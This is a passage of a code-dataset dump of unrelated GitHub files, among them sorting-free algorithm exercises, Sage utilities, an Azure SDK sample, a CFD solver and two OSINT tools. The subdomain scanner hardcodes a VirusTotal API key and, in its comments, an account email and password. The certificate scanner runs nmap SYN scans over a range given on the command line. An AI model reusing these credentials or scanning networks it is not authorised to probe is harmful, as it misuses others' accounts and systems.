[0,0,0,4,1,9,0,0,5],\n [0,0,0,0,8,0,0,7,9]])\n\nS.debug(False) #Don't print intermediate steps\n\n#Solver1\nprint(\"Solver1\")\nS.F = sample\nS.solve1()\nS.display()#Display solver 1 result\nprint(\"Number of guesses \"+ str(S.num_guesses))#Display solver1 number of guesses\n\n#Solver2\nprint(\"\\nSolver2\")\nS.F = sample\nS.solve2()\nS.display()#Display solver 2 result\nprint(\"Number of guesses \"+ str(S.num_guesses))#Display solver2 number of guesses\n","repo_name":"sumanthumesh/sudoku","sub_path":"run_example.py","file_name":"run_example.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14562195407","text":"import json\nfrom datetime import datetime\n\nimport requests\n\nHEADERS = {\n # API-ключ от аккаунта Евнгения\n # email - paholap485@musezoo.com\n # password - Password_123\n 'x-apikey': 'ab5e3e594eaece7f56782e83a27eef8ac11243306d0086e9377fec2fdc2545d0'\n}\n\n# URL для поиска поддоменов и их ip\nURL = 'https://www.virustotal.com/api/v3/domains/'\nDATE = datetime.now().strftime('%d_%m_%Y')\n\n\ndef collect_data(domain):\n response = requests.get(URL + f'{domain}/subdomains?limit=40', headers=HEADERS)\n with open(f'logs/{domain}-{DATE}.json', 'w') as file:\n json.dump(response.json(), file, indent=4, ensure_ascii=False)\n return response\n\n\ndef get_json(filename):\n with open(f'../logs/{filename}.json', 'r', encoding='utf-8') as file:\n json_res = json.load(file)\n return json_res\n\n\ndef parse_collection(response):\n if type(response) is dict:\n data = response['data']\n else:\n data = response.json()['data']\n res = []\n for item in data:\n id = item.get('id') # Домен\n atr = item.get('attributes') # В атрибуте лежит last_dns_records\n dns = atr.get('last_dns_records') # В last_dns_records лежит value c ip (ip есть только у type = A)\n for dnss in dns:\n type_name = dnss.get('type')\n if type_name == 'A':\n ip = dnss.get('value')\n res.append([id, ip])\n return res\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TNB86/OSINT-monitoring-","sub_path":"OSINT_modules/Subdomain_scaner.py","file_name":"Subdomain_scaner.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31553268306","text":"import time\nclass Solution:\n #easy\n def strStr(self, haystack: str, needle: str) -> int:\n n = len(haystack)\n m = len(needle)\n if m == 0:\n return 0\n i=0\n j=0\n while i int:\n if haystack == None or needle == None:\n return -1\n #generate next array, need O(n) time\n i, j, m, n = -1, 0, len(haystack), len(needle)\n next = [-1] * n\n while j < n - 1:\n #needle[k] stands for prefix, neelde[j] stands for postfix\n if i == -1 or needle[i] == needle[j]:\n i, j = i + 1, j + 1\n next[j] = i\n else:\n i = next[i]\n # print(i,j,next[i],next[j])\n #check through the haystack using next, need O(m) time\n i = j = 0\n while i < m and j < n:\n if j == -1 or haystack[i] == needle[j]:\n i, j = i + 1, j + 1\n else:\n j = next[j]\n if j == n:\n return i - j\n return -1\n ###another\n def strStrAnotherKMP(self, haystack: str, needle: str) -> int:\n if not needle: return 0\n if not haystack: return -1\n\n next_arr = self.create_next(needle)\n i = j = 0\n\n while i < len(haystack) and j < len(needle):\n if haystack[i] == needle[j]:\n # Matched, so return the haystack's match start index.\n if j == len(needle) - 1:\n return i - len(needle) + 1\n i, j = i + 1, j + 1\n else:\n # 
Slide pattern over.\n if j: j = next_arr[j-1]\n else: i += 1\n\n return -1\n\n # Build next jump table.\n def create_next(self, pattern):\n next_arr = [0] * len(pattern)\n pre_i, suf_i = 0, 1\n\n while suf_i < len(pattern):\n # Found prefix-suffix match.\n if pattern[pre_i] == pattern[suf_i]:\n next_arr[suf_i] = pre_i + 1\n pre_i, suf_i = pre_i + 1, suf_i + 1\n else:\n if pre_i:\n pre_i = next_arr[pre_i-1]\n else:\n next_arr[suf_i] = 0\n suf_i += 1\n\n return next_arr\nif __name__ == '__main__':\n t = Solution();\n haystack= \"abcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabc\"\n needle =\"abcdabc\"\n print(time.time())\n print(t.strStrByKMP(haystack,needle))\n print(time.time())\n print(t.strStr(haystack,needle))\n print(time.time())\n\n\n","repo_name":"dreamingfish2011/leetcode","sub_path":"com/self/string/_28_ImplementstrStr.py","file_name":"_28_ImplementstrStr.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18051359437","text":"class Person:\n count_instance = 0\n def __init__(self):\n Person.count_instance += 1\n @classmethod\n def count_instances(cls):\n print(f\"You have created {cls.count_instance} instances of {cls.__name__} class...\")\n\n\"\"\"creating instances\"\"\" \np1 = Person()\np2 = Person()\n\n\"\"\"calling class method\"\"\"\nPerson.count_instances()\n","repo_name":"aworld01/cheatsheets","sub_path":"python/tutorials/python@harshitVashisth/5_oop/195_oop_class_method.py","file_name":"195_oop_class_method.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3615409752","text":"from azure.identity import DefaultAzureCredential\nfrom azure.mgmt.servicefabricmanagedclusters import ServiceFabricManagedClustersManagementClient\n\n\"\"\"\n# PREREQUISITES\n pip install azure-identity\n pip install azure-mgmt-servicefabricmanagedclusters\n# USAGE\n python managed_cluster_put_operation_example_max.py\n\n Before run the sample, please set the values of the client ID, tenant ID and client secret\n of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,\n AZURE_CLIENT_SECRET. 
For more info about how to get the value, please see:\n https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal\n\"\"\"\n\n\ndef main():\n client = ServiceFabricManagedClustersManagementClient(\n credential=DefaultAzureCredential(),\n subscription_id=\"00000000-0000-0000-0000-000000000000\",\n )\n\n response = client.managed_clusters.begin_create_or_update(\n resource_group_name=\"resRg\",\n cluster_name=\"myCluster\",\n parameters={\n \"location\": \"eastus\",\n \"properties\": {\n \"addonFeatures\": [\"DnsService\", \"BackupRestoreService\", \"ResourceMonitorService\"],\n \"adminPassword\": \"{vm-password}\",\n \"adminUserName\": \"vmadmin\",\n \"allowRdpAccess\": True,\n \"applicationTypeVersionsCleanupPolicy\": {\"maxUnusedVersionsToKeep\": 3},\n \"auxiliarySubnets\": [\n {\n \"enableIpv6\": True,\n \"name\": \"testSubnet1\",\n \"networkSecurityGroupId\": \"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/resRg/providers/Microsoft.Network/networkSecurityGroups/sn1\",\n \"privateEndpointNetworkPolicies\": \"enabled\",\n \"privateLinkServiceNetworkPolicies\": \"enabled\",\n }\n ],\n \"clientConnectionPort\": 19000,\n \"clusterCodeVersion\": \"7.1.168.9494\",\n \"clusterUpgradeMode\": \"Manual\",\n \"dnsName\": \"myCluster\",\n \"enableAutoOSUpgrade\": True,\n \"enableIpv6\": True,\n \"fabricSettings\": [\n {\"name\": \"ManagedIdentityTokenService\", \"parameters\": [{\"name\": \"IsEnabled\", \"value\": \"true\"}]}\n ],\n \"httpGatewayConnectionPort\": 19080,\n \"ipTags\": [{\"ipTagType\": \"FirstPartyUsage\", \"tag\": \"SQL\"}],\n \"loadBalancingRules\": [\n {\n \"backendPort\": 80,\n \"frontendPort\": 80,\n \"probePort\": 80,\n \"probeProtocol\": \"http\",\n \"protocol\": \"http\",\n },\n {\n \"backendPort\": 443,\n \"frontendPort\": 443,\n \"probePort\": 443,\n \"probeProtocol\": \"http\",\n \"protocol\": \"http\",\n },\n {\n \"backendPort\": 10000,\n \"frontendPort\": 10000,\n \"loadDistribution\": \"Default\",\n \"probePort\": 10000,\n \"probeProtocol\": \"http\",\n \"protocol\": \"tcp\",\n },\n ],\n \"networkSecurityRules\": [\n {\n \"access\": \"allow\",\n \"description\": \"Test description\",\n \"destinationAddressPrefixes\": [\"*\"],\n \"destinationPortRanges\": [\"*\"],\n \"direction\": \"inbound\",\n \"name\": \"TestName\",\n \"priority\": 1010,\n \"protocol\": \"tcp\",\n \"sourceAddressPrefixes\": [\"*\"],\n \"sourcePortRanges\": [\"*\"],\n },\n {\n \"access\": \"allow\",\n \"destinationAddressPrefix\": \"*\",\n \"destinationPortRange\": \"33500-33699\",\n \"direction\": \"inbound\",\n \"name\": \"AllowARM\",\n \"priority\": 2002,\n \"protocol\": \"*\",\n \"sourceAddressPrefix\": \"AzureResourceManager\",\n \"sourcePortRange\": \"*\",\n },\n ],\n \"serviceEndpoints\": [{\"locations\": [\"eastus2\", \"usnorth\"], \"service\": \"Microsoft.Storage\"}],\n \"useCustomVnet\": True,\n \"zonalResiliency\": True,\n \"zonalUpdateMode\": \"Fast\",\n },\n \"sku\": {\"name\": \"Basic\"},\n \"tags\": {},\n },\n ).result()\n print(response)\n\n\n# x-ms-original-file: specification/servicefabricmanagedclusters/resource-manager/Microsoft.ServiceFabric/preview/2023-02-01-preview/examples/ManagedClusterPutOperation_example_max.json\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/servicefabricmanagedclusters/azure-mgmt-servicefabricmanagedclusters/generated_samples/managed_cluster_put_operation_example_max.py","file_name":"managed_cluster_put_operation_example_max.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"27681839073","text":"from collections import OrderedDict\nfrom sage.all import (operator, flatten, PolynomialRing, SR, QQ, ZZ, RR, sage, oo)\nfrom vu_common import (pause, get_logger,is_iterable, is_str, is_empty) \n \nis_sage_expr = lambda x: isinstance(x, sage.symbolic.expression.Expression)\nis_sage_real = lambda x: isinstance(x, sage.rings.real_mpfr.RealLiteral)\nis_sage_int = lambda x: isinstance(x, sage.rings.integer.Integer)\nis_sage_num = lambda x: is_sage_real(x) or is_sage_int(x)\ndef is_sage_inf(x):\n \"\"\"\n Example:\n sage: is_sage_inf(oo)\n True\n sage: is_sage_inf(-oo)\n True\n sage: is_sage_inf(oo+3)\n True\n sage: is_sage_inf(oo-3)\n True\n sage: is_sage_inf(SR(-oo))\n True\n sage: is_sage_inf(x)\n False\n sage: is_sage_inf(x+3)\n False\n sage: is_sage_inf(8)\n False\n \"\"\"\n try:\n return x.is_infinity()\n except AttributeError:\n return x == oo or x == -oo\n\nis_sage_int_inf = lambda x: is_sage_int(x) or is_sage_inf(x)\nto_sage_int = lambda x: x if is_sage_int(x) else ZZ(x)\n\n\ndef is_sage_symbol(s):\n \"\"\"\n sage: assert is_sage_symbol(x)\n sage: assert not is_sage_symbol(x+1)\n sage: assert not is_sage_symbol(1)\n \"\"\"\n try:\n return s.is_symbol()\n except AttributeError:\n return False\n\ndef is_sage_rel(f, rel=None):\n \"\"\"\n sage: assert not is_sage_rel(7.2)\n sage: assert not is_sage_rel(x)\n sage: assert not is_sage_rel(x+7)\n sage: assert is_sage_rel(x==3,operator.eq)\n\n sage: assert is_sage_rel(x<=3,operator.le)\n sage: assert not is_sage_rel(x<=3,operator.lt)\n sage: assert not is_sage_rel(x+3,operator.lt)\n\n sage: y = var('y')\n sage: assert is_sage_rel(x+y<=3)\n \"\"\"\n\n try:\n if not f.is_relational(): \n return False\n\n if rel is None:\n return True\n else:\n return f.operator() == rel\n\n except AttributeError:\n return False\n \nis_sage_eq = lambda f: is_sage_rel(f, operator.eq)\n\ndef get_vars(ps):\n \"\"\"\n Returns a list of uniq variables from a list of properties\n\n Examples:\n\n sage: var('a b c x')\n (a, b, c, x)\n\n sage: assert [a, b, c, x] == get_vars([x^(a*b) + a**2+b+2==0, c**2-b==100, b**2 + c**2 + a**3>= 1])\n sage: assert get_vars(a**2+b+5*c+2==0) == [a, b, c]\n sage: assert get_vars(x+x^2) == [x]\n sage: assert get_vars([3]) == []\n sage: assert get_vars((3,'x + c',x+b)) == [b, x]\n \"\"\"\n\n ps = ps if is_iterable(ps) else [ps]\n\n vs = flatten([p.variables() for p in ps if is_sage_expr(p)])\n\n return sorted(set(vs), key=str)\n\n\ndef get_coefs_terms(p, base_ring = QQ, as_dict=False):\n \"\"\"\n Returns the Coefs and Terms of a given expression\n\n Examples:\n sage: assert get_coefs_terms(x) == ([1], [x])\n\n sage: assert get_coefs_terms(x,as_dict=True) == {x: 1}\n\n sage: var('a b c')\n (a, b, c)\n\n sage: assert get_coefs_terms(a**2+b+5*c+2==0) == ([1, 1, 5, 2], [a^2, b, c, 1])\n sage: assert get_coefs_terms(a**2+b+5*c+2==0, as_dict=True) == {b: 1, 1: 2, a^2: 1, c: 5}\n\n sage: assert get_coefs_terms(10/3*a**2+3*b+5*c+2) == ([10/3, 3, 5, 2], [a^2, b, c, 1])\n sage: assert get_coefs_terms(10/3*a**2+3*b+5*c+2, as_dict=True) == {b: 3, 1: 2, a^2: 10/3, c: 5}\n\n sage: assert get_coefs_terms(a+b<=3, as_dict=True) == 
{1: -3, b: 1, a: 1}\n sage: assert all(is_sage_int(v) for v in get_coefs_terms(a+b<=3, as_dict=True, base_ring=ZZ).values())\n\n #sage 6.2 breaks this\n #sage: assert get_coefs_terms(a - b <= oo) == ([1, -1, -infinity], [a, b, 1])\n\n sage: assert get_coefs_terms(SR(7), as_dict=True) == {1: 7}\n sage: assert get_coefs_terms(SR(3))==([3], [1])\n sage: assert get_coefs_terms(SR(oo))==([+Infinity], [1])\n sage: assert get_coefs_terms(SR(-oo)) == ([-Infinity], [1])\n sage: assert get_coefs_terms(a + b <= .9,base_ring=ZZ) == ([1, 1, -0.900000000000000], [a, b, 1])\n \n sage: assert is_sage_int(get_coefs_terms(SR(7),base_ring=ZZ,as_dict=True).values()[0])\n\n \"\"\"\n\n use_wrong_base_ring = False\n\n if is_sage_rel(p):\n p = mk_rhs_0(p).lhs()\n\n if p.is_integer() or p.is_real():\n ts = [SR(1)]\n cs = [p if p.is_infinity() else base_ring(p)]\n\n else:\n ss = get_vars(p)\n assert not is_empty(ss), (p,ss)\n\n mk_pr = lambda b, p: PolynomialRing(b, ss, None if len(ss) >= 2 else 1)(p)\n\n try:\n pr_p = mk_pr(base_ring, p)\n except TypeError:\n \n if base_ring == RR:\n #if cannot do over RR then return None\n return None \n else:\n #otherwise, try with RR\n try:\n pr_p = mk_pr(RR,p)\n use_wrong_base_ring = True\n except Exception as msg:\n return None\n \n cs = pr_p.coefficients()\n ts = map(SR, pr_p.monomials())\n\n\n if use_wrong_base_ring:\n ts = [SR(1) if bool(t.is_one()) else t for t in ts]\n cs_ = []\n for c in cs:\n if c == oo:\n cs_.append(oo)\n elif c == -oo:\n cs_.append(-oo)\n else:\n try:\n cs_.append(base_ring(c))\n except ValueError:\n cs_.append(c)\n except TypeError:\n cs_.append(c)\n cs = cs_\n \n assert all(is_sage_expr(t) for t in ts), ts\n\n if as_dict:\n d = OrderedDict()\n for t,c in zip(ts,cs):\n d[t] = c\n return d\n else:\n return cs,ts\n\n\ndef mk_rhs_0(p):\n \"\"\"\n sage: var('x,y')\n (x, y)\n sage: mk_rhs_0(x - y >= 3)\n x - y - 3 >= 0\n\n sage: mk_rhs_0(x - y - 3 >= 0)\n x - y - 3 >= 0\n\n\n sage: mk_rhs_0(0 <= x - y - 3)\n -x + y + 3 <= 0\n\n sage: mk_rhs_0(0 == x)\n -x == 0\n\n sage: mk_rhs_0(10 == -x)\n x + 10 == 0\n\n #Sage 5.11 broke all these (i.e., broke lhs.add(..,hold=))\n # sage: mk_rhs_0(x <= oo)\n # x - Infinity <= 0\n\n # sage: mk_rhs_0(x <= -oo)\n # x + +Infinity <= 0\n\n # sage: mk_rhs_0(x >= oo)\n # x - Infinity >= 0\n\n # sage: mk_rhs_0(oo >= x)\n # +Infinity - x >= 0\n\n sage: mk_rhs_0(x - y - 3)\n Traceback (most recent call last):\n ...\n AssertionError: x - y - 3\n\n\n \"\"\"\n assert is_sage_rel(p), p\n\n rhs = p.rhs()\n lhs = p.lhs()\n if not rhs.is_zero():\n lhs = lhs.add(-rhs, hold=(rhs.is_infinity() or lhs.is_infinity()))\n rhs = 0\n p = p.operator()(lhs, rhs)\n\n return p\n\n\n# def myreduce(op, ls):\n# \"\"\"\n# Apply operator op to list of arguments\n\n# Note, it seems the above arguments are *enough*, no need to implement for (-,div) etc because the function that calls this will break x - y to myreduce(op,[x,-y]) or x / y to myreduce(op,[x,1/y]) and 1/y => mul(1,y^{-1})\n\n# sage: assert myreduce(operator.add, [x,x]) == 2*x\n# sage: assert myreduce(operator.add, [3,x]) == x + 3\n# sage: myreduce(operator.le, [3,x])\n# 3 <= x\n# sage: assert myreduce(operator.pow,[3,x]) == 3^x\n\n\n# \"\"\"\n# if __debug__:\n# assert len(ls) >= 2, ls\n# assert op in [operator.add,operator.mul,\n# operator.pow,operator.eq,operator.ne,\n# operator.le,operator.lt,operator.ge,operator.gt], op\n# return reduce(lambda a, b: op(a,b), ls[1:], ls[0])\n\n\n\n# def mk_expr(expr, d, ring_typ=ZZ):\n# \"\"\"\n# Make a new expression like expr but with all vars in expr 
replaced\n# with those in dictionary d. Used when subs() is not applicable\n# sage: y = var('y')\n\n# sage: lp = MixedIntegerLinearProgram()\n# sage: s0 = lp['s0']\n# sage: s1 = lp['s1']\n# sage: d = {x:s0,y:s1}\n# sage: mk_expr(x+y+3, d)\n# 3 + x_0 + x_1\n# sage: mk_expr(x+y+3<=8,d)\n# 3 + x_0 + x_1 <= 8\n# sage: mk_expr(x==y+5,d)\n# x_0 == 5 + x_1\n# \"\"\"\n# def retval(expr):\n# if is_sage_symbol(expr): #symbol, e.g. x\n# return d[expr]\n# else: #const , e.g. 3\n# return ring_typ(expr)\n# try:\n# oprs = expr.operands()\n# except AttributeError:\n# #e.g. const 3, .5\n# return retval(expr)\n\n# if is_empty(oprs): #symbol\n# return retval(expr)\n# else:\n# oprs = [mk_expr(o,d) for o in oprs]\n# print oprs\n# rs = myreduce(expr.operator(), oprs)\n# return rs\n\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"dynaroars/numinv","sub_path":"sageutil.py","file_name":"sageutil.py","file_ext":"py","file_size_in_byte":8506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"842380339","text":"#!/usr/bin/env python3\n\n#\n# under root\n# pip3.8 install --user python3-nmap\n# pip3.8 install --user pyopenssl\n#\n\nfrom nmap3 import NmapScanTechniques\nimport nmap3\nimport OpenSSL\nimport ssl\nimport sys\n\n\n\nh = NmapScanTechniques()\ntcp_syn_scan = h.nmap_syn_scan(sys.argv[1])\n\nprint('\\n')\nprint('{0:29}|{1:45}|{2}'.format('host',' cert serial Number', ' cert CN'))\nprint('-----------------------------|---------------------------------------------|--------------')\n\n\nfor host in tcp_syn_scan.keys():\n for port in tcp_syn_scan[host]:\n try:\n if \"host\" in port:\n if port['portid'] == '443':\n cert_pem = ssl.get_server_certificate((port['host'], 443))\n x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_pem)\n subject = x509.get_subject()\n print('{0:30}{1:46}{2}'.format(port['host'],hex(x509.get_serial_number()),subject.CN))\n except:\n break\n","repo_name":"ivan-1989/cert-scaner-nmap","sub_path":"cert-scaner-nmap.py","file_name":"cert-scaner-nmap.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71265764641","text":"import numpy as np\nimport os\n\n\nclass Boundary:\n def __init__(self, boundary_type, boundary_value):\n self.DefineBoundary(boundary_type, boundary_value)\n\n def DefineBoundary(self, boundary_type, boundary_value):\n self.type = boundary_type\n self.value = boundary_value\n\n\nclass Space:\n def __init__(self):\n pass\n\n def CreateMesh(self, rowpts, colpts):\n # Domain gridpoints\n self.rowpts = rowpts\n self.colpts = colpts\n # Velocity matrices\n self.u = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_star = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v_star = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_next = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v_next = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_c = np.zeros((self.rowpts, self.colpts))\n self.v_c = np.zeros((self.rowpts, self.colpts))\n # Pressure matrices\n self.p = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.p_c = np.zeros((self.rowpts, self.colpts))\n\n # Set default source term\n self.SetSourceTerm()\n\n def SetDeltas(self, breadth, length):\n self.dx = length / (self.colpts - 1)\n self.dy = breadth / (self.rowpts - 1)\n\n def SetInitialU(self, U):\n self.u = U * self.u\n\n def 
SetInitialV(self, V):\n self.v = V * self.v\n\n def SetInitialP(self, P):\n self.p = P * self.p\n\n def SetSourceTerm(self, S_x=0, S_y=0):\n self.S_x = S_x\n self.S_y = S_y\n\n\nclass Fluid:\n def __init__(self, rho, mu):\n self.SetFluidProperties(rho, mu)\n\n def SetFluidProperties(self, rho, mu):\n self.rho = rho\n self.mu = mu\n\n\n# Note: The arguments to the function are all objects of our defined classes\n# Set boundary conditions for horizontal velocity\ndef SetUBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.u[:, 0] = left.value\n elif left.type == \"N\":\n space.u[:, 0] = -left.value * space.dx + space.u[:, 1]\n\n if right.type == \"D\":\n space.u[:, -1] = right.value\n elif right.type == \"N\":\n space.u[:, -1] = right.value * space.dx + space.u[:, -2]\n\n if top.type == \"D\":\n space.u[-1, :] = 2 * top.value - space.u[-2, :]\n elif top.type == \"N\":\n space.u[-1, :] = -top.value * space.dy + space.u[-2, :]\n\n if bottom.type == \"D\":\n space.u[0, :] = 2 * bottom.value - space.u[1, :]\n elif bottom.type == \"N\":\n space.u[0, :] = bottom.value * space.dy + space.u[1, :]\n\n\n# Set boundary conditions for vertical velocity\ndef SetVBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.v[:, 0] = 2 * left.value - space.v[:, 1]\n elif left.type == \"N\":\n space.v[:, 0] = -left.value * space.dx + space.v[:, 1]\n\n if right.type == \"D\":\n space.v[:, -1] = 2 * right.value - space.v[:, -2]\n elif right.type == \"N\":\n space.v[:, -1] = right.value * space.dx + space.v[:, -2]\n\n if top.type == \"D\":\n space.v[-1, :] = top.value\n elif top.type == \"N\":\n space.v[-1, :] = -top.value * space.dy + space.v[-2, :]\n\n if bottom.type == \"D\":\n space.v[0, :] = bottom.value\n elif bottom.type == \"N\":\n space.v[0, :] = bottom.value * space.dy + space.v[1, :]\n\n\n# Set boundary conditions for pressure\ndef SetPBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.p[:, 0] = left.value\n elif left.type == \"N\":\n space.p[:, 0] = -left.value * space.dx + space.p[:, 1]\n\n if right.type == \"D\":\n space.p[1, -1] = right.value\n elif right.type == \"N\":\n space.p[:, -1] = right.value * space.dx + space.p[:, -2]\n\n if top.type == \"D\":\n space.p[-1, :] = top.value\n elif top.type == \"N\":\n space.p[-1, :] = -top.value * space.dy + space.p[-2, :]\n\n if bottom.type == \"D\":\n space.p[0, :] = bottom.value\n elif bottom.type == \"N\":\n space.p[0, :] = bottom.value * space.dy + space.p[1, :]\n\n\ndef SetTimeStep(CFL, space, fluid):\n with np.errstate(divide=\"ignore\"):\n dt = CFL / np.sum([np.amax(space.u) / space.dx, np.amax(space.v) / space.dy])\n # Escape condition if dt is infinity due to zero velocity initially\n if np.isinf(dt):\n dt = CFL * (space.dx + space.dy)\n space.dt = dt\n\n\n# The first function is used to get starred velocities from u and v at timestep t\ndef GetStarredVelocities(space, fluid):\n # Save object attributes as local variable with explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u = space.u.astype(float, copy=False)\n v = space.v.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n S_x = float(space.S_x)\n S_y = float(space.S_y)\n rho = float(fluid.rho)\n mu = float(fluid.mu)\n\n # Copy u and v to new variables u_star and v_star\n u_star = u.copy()\n v_star = v.copy()\n\n # Calculate derivatives of u and v using the finite difference scheme.\n # Numpy vectorization saves us from using slower for 
loops to go over each element in the u and v matrices\n u1_y = (u[2:, 1 : cols + 1] - u[0:rows, 1 : cols + 1]) / (2 * dy)\n u1_x = (u[1 : rows + 1, 2:] - u[1 : rows + 1, 0:cols]) / (2 * dx)\n u2_y = (\n u[2:, 1 : cols + 1]\n - 2 * u[1 : rows + 1, 1 : cols + 1]\n + u[0:rows, 1 : cols + 1]\n ) / (dy**2)\n u2_x = (\n u[1 : rows + 1, 2:]\n - 2 * u[1 : rows + 1, 1 : cols + 1]\n + u[1 : rows + 1, 0:cols]\n ) / (dx**2)\n v_face = (\n v[1 : rows + 1, 1 : cols + 1]\n + v[1 : rows + 1, 0:cols]\n + v[2:, 1 : cols + 1]\n + v[2:, 0:cols]\n ) / 4\n u_star[1 : rows + 1, 1 : cols + 1] = (\n u[1 : rows + 1, 1 : cols + 1]\n - dt * (u[1 : rows + 1, 1 : cols + 1] * u1_x + v_face * u1_y)\n + (dt * (mu / rho) * (u2_x + u2_y))\n + (dt * S_x)\n )\n\n v1_y = (v[2:, 1 : cols + 1] - v[0:rows, 1 : cols + 1]) / (2 * dy)\n v1_x = (v[1 : rows + 1, 2:] - v[1 : rows + 1, 0:cols]) / (2 * dx)\n v2_y = (\n v[2:, 1 : cols + 1]\n - 2 * v[1 : rows + 1, 1 : cols + 1]\n + v[0:rows, 1 : cols + 1]\n ) / (dy**2)\n v2_x = (\n v[1 : rows + 1, 2:]\n - 2 * v[1 : rows + 1, 1 : cols + 1]\n + v[1 : rows + 1, 0:cols]\n ) / (dx**2)\n u_face = (\n u[1 : rows + 1, 1 : cols + 1]\n + u[1 : rows + 1, 2:]\n + u[0:rows, 1 : cols + 1]\n + u[0:rows, 2:]\n ) / 4\n v_star[1 : rows + 1, 1 : cols + 1] = (\n v[1 : rows + 1, 1 : cols + 1]\n - dt * (u_face * v1_x + v[1 : rows + 1, 1 : cols + 1] * v1_y)\n + (dt * (mu / rho) * (v2_x + v2_y))\n + (dt * S_y)\n )\n\n # Save the calculated starred velocities to the space object\n space.u_star = u_star.copy()\n space.v_star = v_star.copy()\n\n\n# The second function is used to iteratively solve the pressure Possion equation from the starred velocities\n# to calculate pressure at t+delta_t\ndef SolvePressurePoisson(space, fluid, left, right, top, bottom):\n # Save object attributes as local variable with explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u_star = space.u_star.astype(float, copy=False)\n v_star = space.v_star.astype(float, copy=False)\n p = space.p.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n rho = float(fluid.rho)\n factor = 1 / (2 / dx**2 + 2 / dy**2)\n\n # Define initial error and tolerance for convergence (error > tol necessary initially)\n error = 1\n tol = 1e-3\n\n # Evaluate derivative of starred velocities\n ustar1_x = (u_star[1 : rows + 1, 2:] - u_star[1 : rows + 1, 0:cols]) / (2 * dx)\n vstar1_y = (v_star[2:, 1 : cols + 1] - v_star[0:rows, 1 : cols + 1]) / (2 * dy)\n\n # Continue iterative solution until error becomes smaller than tolerance\n i = 0\n while error > tol:\n i += 1\n\n # Save current pressure as p_old\n p_old = p.astype(float, copy=True)\n\n # Evaluate second derivative of pressure from p_old\n p2_xy = (p_old[2:, 1 : cols + 1] + p_old[0:rows, 1 : cols + 1]) / dy**2 + (\n p_old[1 : rows + 1, 2:] + p_old[1 : rows + 1, 0:cols]\n ) / dx**2\n\n # Calculate new pressure\n p[1 : rows + 1, 1 : cols + 1] = (p2_xy) * factor - (rho * factor / dt) * (\n ustar1_x + vstar1_y\n )\n\n # Find maximum error between old and new pressure matrices\n error = np.amax(abs(p - p_old))\n\n # Apply pressure boundary conditions\n SetPBoundary(space, left, right, top, bottom)\n\n # Escape condition in case solution does not converge after 500 iterations\n if i > 500:\n tol *= 10\n\n\n# The third function is used to calculate the velocities at timestep t+delta_t using the pressure at t+delta_t and starred velocities\ndef SolveMomentumEquation(space, fluid):\n # Save object attributes as local variable with 
